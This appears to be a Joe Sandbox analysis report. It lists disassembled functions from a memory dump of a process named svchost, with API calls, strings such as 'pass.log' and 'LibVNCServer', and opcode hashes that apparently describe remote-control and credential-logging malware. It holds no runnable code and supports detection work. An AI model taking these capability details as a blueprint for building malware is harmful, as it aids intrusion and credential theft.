Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseProcesslstrcpynmemset
String ID:
API String ID: 3057210225-0
Opcode ID: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
Instruction ID: 4f0b01245737fa7da752c37295db53623940fa9153e1b90dd3e3a415debeda5d
Opcode Fuzzy Hash: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
Instruction Fuzzy Hash: 1B114E31E815981BEB2B9774AC0DBDD779CEF5C704F1049E9EA49D7181D3B08A848B91

Function 02C7C2B0 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02C7C2C2
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C7C2D9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7C2EF
CloseHandle.KERNEL32(00000000), ref: 02C7C300
ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C7C317

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
String ID:
API String ID: 1270303404-0
Opcode ID: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
Instruction ID: fa5839e23e620cd07b6d641c22ee302d381c8dd328d23801ca2f16bbda693b11
Opcode Fuzzy Hash: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
Instruction Fuzzy Hash: CB016D31A81658BBE721DB909D09FEABB7CAB05700F004685BE05A61C0DBB05B84CAA9

Function 02C7D330 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,?,00000000,76233080,?,02C782BC,?,00000006,00000000), ref: 02C7D33C
GetWindow.USER32(00000000,00000005), ref: 02C7D353
GetWindow.USER32(00000000), ref: 02C7D356
SendMessageA.USER32(00000000,00000006,?,02C782BC), ref: 02C7D36D
GetWindow.USER32(00000000,00000003), ref: 02C7D372

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$DesktopMessageSendThread
String ID:
API String ID: 3855296974-0
Opcode ID: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
Instruction ID: ac6f0cea62db6b4614dbee0b083b0783286056901d2d81e97fb8edad2a23fa5b
Opcode Fuzzy Hash: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
Instruction Fuzzy Hash: F0F08276A807187FD622DB55EC88FABB7ACEFC8B60F014605F90497340CA70ED118AB0

Function 02C7C330 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
GetCurrentThreadId.KERNEL32 ref: 02C7C344
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
String ID:
API String ID: 2643679612-0
Opcode ID: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
Instruction ID: 959e801d460fe618b7d861801d82dddbef8d6917c6acba2e40b479354d5c2cc3
Opcode Fuzzy Hash: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
Instruction Fuzzy Hash: 65F03732680344BBD7115BA5EC8DF9BBF6CEB89761F004955FA05C7241C575DC118A70

Function 02C7D2F0 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7D2FA
GetCurrentThreadId.KERNEL32 ref: 02C7D302
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D314
GetFocus.USER32 ref: 02C7D316
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D323

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentFocusProcessWindow
String ID:
API String ID: 968181190-0
Opcode ID: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
Instruction ID: 28bfdfac62720a456aaab90a63a047adc048fab3a29c7a037b15124af4f38da9
Opcode Fuzzy Hash: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
Instruction Fuzzy Hash: 05E0D832E80254BBD71257B6AC4DF9BBFACEB85761F100A95FA08C3241D575DC108AB0

Function 02C873B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 02C87461

Part of subcall function 02C86DE0: fseek.MSVCRT ref: 02C86E04
Part of subcall function 02C86DE0: fwrite.MSVCRT ref: 02C86E17

fseek.MSVCRT ref: 02C873EA
fread.MSVCRT ref: 02C87408

Strings

82c31cf4, xrefs: 02C873B0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: fseek$freadfwritestrncpy
String ID: 82c31cf4
API String ID: 3817246059-1946308177
Opcode ID: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
Instruction ID: b8e7cecda93eb0dead1d0f925f56b964769aedb0d50f87b117b0d37f1e7c93e9
Opcode Fuzzy Hash: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
Instruction Fuzzy Hash: 0631A479A006418FC731DB28D484B22FBE5EFC5218F288A9DD48587752E335E8C9CFA1

Function 02C8E1B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c319a5), ref: 02C8E1D7
PathFileExistsA.SHLWAPI(?), ref: 02C8E240

Strings

pass.log, xrefs: 02C8E21F
82c319a5, xrefs: 02C8E1D2, 02C8E1DD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashExistsFile
String ID: 82c319a5$pass.log
API String ID: 1760361154-4118121134
Opcode ID: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
Instruction ID: cde347b72a7618a63202c6e584855481142a0c40c80e2d4882351e2cace664e9
Opcode Fuzzy Hash: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
Instruction Fuzzy Hash: 81112B715046994BC71A8B3CA8A86F7BFE49BC6304B24C6D5ECC987302EA308949C780

Function 02CA2040 Relevance: 6.3, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 02CA205B
free.MSVCRT ref: 02CA206D
free.MSVCRT ref: 02CA207F
free.MSVCRT ref: 02CA2091
free.MSVCRT ref: 02CA209B

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
Instruction ID: 32decc90f6327c08c48a5e4470352e3794319a5cb4ff2731381c70f0029124e5
Opcode Fuzzy Hash: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
Instruction Fuzzy Hash: 110140B2A017925FD730DFA998A241BBAD57D8010C359893DD9DB87A04D332EA48D683

Function 02C999D0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02C99A29
realloc.MSVCRT ref: 02C99A35
malloc.MSVCRT ref: 02C99A5B
realloc.MSVCRT ref: 02C99A67

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
Instruction ID: 6cde7e2f18e87d6f173b652e2c6a1794951f391c4f574f69ca29a89e7ee0b19a
Opcode Fuzzy Hash: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
Instruction Fuzzy Hash: DA91D072E402559FCF14CF68CD89BAA3BA6FF84305F1445BDED099B342D674A911CBA0

Function 02CA29B0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02CA2A09
realloc.MSVCRT ref: 02CA2A15
malloc.MSVCRT ref: 02CA2A3B
realloc.MSVCRT ref: 02CA2A47

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
Instruction ID: 4f4f3afa43a001937bef1278ed365547be65adbf3fd40dbb2645ab194026c166
Opcode Fuzzy Hash: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
Instruction Fuzzy Hash: CD91E371E402168FDB14CF64DC90BEA7BA5EF84309F1445B9ED0A9B345D634AD12CBE1

Function 02C9E8C0 Relevance: 6.1, APIs: 4, Instructions: 146COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02C9E8EB
closesocket.WS2_32(?), ref: 02C9E950
closesocket.WS2_32(?), ref: 02C9E9C0
closesocket.WS2_32(?), ref: 02C9EA30

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
Instruction ID: 1f5c1bca1454f4497758cdfbd9b6462781be5221fc9b1ed8a8ef1214c8089ceb
Opcode Fuzzy Hash: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
Instruction Fuzzy Hash: 56510370140B019BCB65CF29C8887D6B7A6FBA5328F75CA1AC46B87294EF31E546CB50

Function 02C9BBD0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02C9BC02

Strings

LibVNCServer 0.9.7, xrefs: 02C9BBF0
%s (%s), xrefs: 02C9BBFC
unknown, xrefs: 02C9BBEB, 02C9BBF5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s (%s)$LibVNCServer 0.9.7$unknown
API String ID: 2111968516-696653274
Opcode ID: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
Instruction ID: f3a6578cfe0d99802cf4209567976f5db84ca5528890942b20ec814025212247
Opcode Fuzzy Hash: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
Instruction Fuzzy Hash: BA41D631A0465A5FDF01CF28D9A8BE67BA5EF85305F0481F5DD0D9F206DB74A60ACBA0

Function 02C81130 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C81152
GetParent.USER32(?), ref: 02C8115E
GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ParentTextWindowmemset
String ID:
API String ID: 4175915554-0
Opcode ID: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
Instruction ID: 1c6e0f74244909d4871718247bf6364bebca429c8ae02ae73b286adc8dbb48c1
Opcode Fuzzy Hash: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
Instruction Fuzzy Hash: DA01D673F402146BDB10AE69ACC8EE7F39CAB54554F048376ED0CE3141EAB1DA5586E0

Function 02C87A10 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,?), ref: 02C87A23

Part of subcall function 02C82CE0: GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
Part of subcall function 02C82CE0: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
Part of subcall function 02C82CE0: memset.MSVCRT ref: 02C82D08

memcpy.MSVCRT(00000000,?,?,?,?,?,?,02C7E885,?), ref: 02C87A3E

Part of subcall function 02C8CBC0: memset.MSVCRT ref: 02C8CBE1
Part of subcall function 02C8CBC0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8CC4D
Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8CC83
Part of subcall function 02C8CBC0: PathFileExistsA.SHLWAPI(00000000,82C3184B), ref: 02C8CCC9

Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B23
Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B36
Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B49
Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
Part of subcall function 02C92AE0: CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
Part of subcall function 02C92AE0: GetLastError.KERNEL32 ref: 02C92BCC
Part of subcall function 02C92AE0: IsUserAnAdmin.SHELL32 ref: 02C92BD4
Part of subcall function 02C92AE0: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
Part of subcall function 02C92AE0: SetLastError.KERNEL32(00000000), ref: 02C92BEC
Part of subcall function 02C92AE0: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9

Strings

GET , xrefs: 02C87A5A
POST, xrefs: 02C87A61

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$Backslash$strstr$DirectoryErrorHeapLastmemset$AdminAllocateCreateCurrentExistsFileFolderMakeProcessReadSystemUsermemcpy
String ID: GET $POST
API String ID: 166286580-2494278042
Opcode ID: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
Instruction ID: 454c8b4f1ef71aedd1db641b8b7ff59109e943cb5a645da23fe2aedae5e37bcd
Opcode Fuzzy Hash: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
Instruction Fuzzy Hash: 9EF0283688169136993175A49C84EFFE68D9E93B8CB20A11AE84462100FB39EB0495E6

Function 02C74000 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000020,7622F380,-00000010,?,02C7429D,?), ref: 02C7400C
HeapAlloc.KERNEL32(00000000,?,02C7429D,?), ref: 02C74013
_snprintf.MSVCRT ref: 02C74052

Strings

%d.%d.%d.%d, xrefs: 02C7404A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess_snprintf
String ID: %d.%d.%d.%d
API String ID: 1060465051-3491811756
Opcode ID: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
Instruction ID: b501dc9029d853eb5de918cf6f5f699e1cdf3f06e2e433a3f3b2e217bf1b4a7d
Opcode Fuzzy Hash: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
Instruction Fuzzy Hash: 55F08CB1940760AFC371CF6A9804B66BBE8EF0C701F00892EF69AC7241E23496008BA4

Function 02C891C0 Relevance: 6.0, APIs: 4, Instructions: 37synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,75AF7390,?,?,02C85BC4), ref: 02C891DA
CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C891F4
GetHandleInformation.KERNEL32(00000000,?,?,?,02C85BC4), ref: 02C8920C
CloseHandle.KERNEL32(00000000,?,?,02C85BC4), ref: 02C8921D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandle$CloseInformationMutexThread
String ID:
API String ID: 3835061634-0
Opcode ID: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
Instruction ID: 4e8631e050a50982036c6b7776b7dda47c50071a89984e1eb5ade44873145600
Opcode Fuzzy Hash: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
Instruction Fuzzy Hash: E8F0BB31EC1314B7E7119BA4FC0AB667A9CEB05F14F184695F901E72C0D7B095108796

Function 02C8A2A0 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02C876BE,00000000,02C7FB03,82c3181f,?,?,?,?,?,?), ref: 02C8A2B0
CreateThread.KERNEL32(00000000,00000000,02C8A150,00000000,00000000,00000000), ref: 02C8A2C5
GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2E3
CloseHandle.KERNEL32(00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2F4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
Instruction ID: 7759032f49a377ce48a3e10749932e5de361918053dd698e3838140c36dd71ea
Opcode Fuzzy Hash: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
Instruction Fuzzy Hash: 02F0B430EC0345BBE730EB65AC0AB5577ACAB0CB09F208686F909E31C0DBB096108A65

Function 02C8E830 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02C8790E,00000000,02C7FB03,82c319a5,?,?,?,?,?,?), ref: 02C8E840
CreateThread.KERNEL32(00000000,00000000,02C8E6E0,00000000,00000000,00000000), ref: 02C8E855
GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E873
CloseHandle.KERNEL32(00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E884

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
Instruction ID: d615bfe10b210424d3e604edf11a4273885034ed02a1762a4227eef9c07d4bed
Opcode Fuzzy Hash: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
Instruction Fuzzy Hash: 4EF0B430EC0314BBE7209B68AC0AB5D779CEF04749F244694FD05E31C0DBB0D6108A64

Function 02C8D930 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02C8785E,00000000,02C7FB03,82c31923,?,?,?,?,?,?), ref: 02C8D940
CreateThread.KERNEL32(00000000,00000000,02C8D7E0,00000000,00000000,00000000), ref: 02C8D955
GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D973
CloseHandle.KERNEL32(00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D984

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
Instruction ID: 2f326863c8cd02590b19e2f8b904345b89ea7561fb1a108660138517cc8e40b9
Opcode Fuzzy Hash: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
Instruction Fuzzy Hash: FEF0B470EC0304B7E7209B75AD0AF55B69C9B04B59F144694F90AE31C4DBB09610CB64

Function 02C8E250 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

private, xrefs: 02C8E2B0
public, xrefs: 02C8E352

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: private$public
API String ID: 0-4176808989
Opcode ID: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
Instruction ID: ec1e89868abdafde7671aa854f668a39e363cdb733b1ccd60b70895c1776268f
Opcode Fuzzy Hash: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
Instruction Fuzzy Hash: FB415B326041158ACB30BB2CC8557BB7366EFC532CB49C695F84ACB6A4F721EE45C780

Function 02C74070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02C74072
_snprintf.MSVCRT ref: 02C740D6

Strings

%dd %dh %dm, xrefs: 02C740C7

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

